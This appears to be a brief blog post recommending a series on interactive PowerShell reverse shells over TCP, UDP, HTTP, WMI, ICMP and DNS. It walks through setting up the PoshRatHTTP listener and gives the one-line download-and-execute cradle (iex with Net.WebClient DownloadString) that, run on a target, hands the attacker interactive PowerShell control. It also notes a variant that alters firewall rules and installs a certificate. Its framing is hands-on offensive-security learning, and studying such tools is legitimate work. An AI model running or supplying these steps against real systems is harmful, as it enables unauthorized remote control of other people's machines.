Day 1 – Interactive PowerShell shells over TCP (Click here)
Day 2 – Interactive PowerShell shells over UDP (Click Here)
Day 3 – Interactive PowerShell shells over HTTP/HTTPS (Click Here)
Day 4 – Interactive PowerShell shells with WMI (Click Here)
Day 5 – Interactive PowerShell shells over ICMP and DNS (Click Here)
Nikhil is the author of offensive security Powershell tools Nishang and Kautilya and his blog post series is ideal if you want to roll up your sleeves and play with these tools manually, rather than as part of a framework. I find this strategy helps me see under the hood and really get to grips with the code itself.
Download PoshRatHTTP.ps1 on you server and be sure to adjust your execution-policy in an elevated Powershell console to allow for script execution.
Change line 12 of the code:
$Server = '127.0.0.1'
To your “Listening” machine IP
Run the script which creates a HTTP listener that downloads code to the target on connection.
Next make the connection on the target machine in Powershell:
iex (New-Object Net.WebClient).DownloadString("http://server/connect")
And you have interactive Powershell control.
There are other ways to deliver the code to the target that I haven’t investigated yet. There is also a HTTPS version that allows for encrypted communication, changes firewall rules and even adds a security certificate!
I’d encourage you to hop over to Nikhil’s blog post series where there are instructions, images and videos.
Enjoy. I am.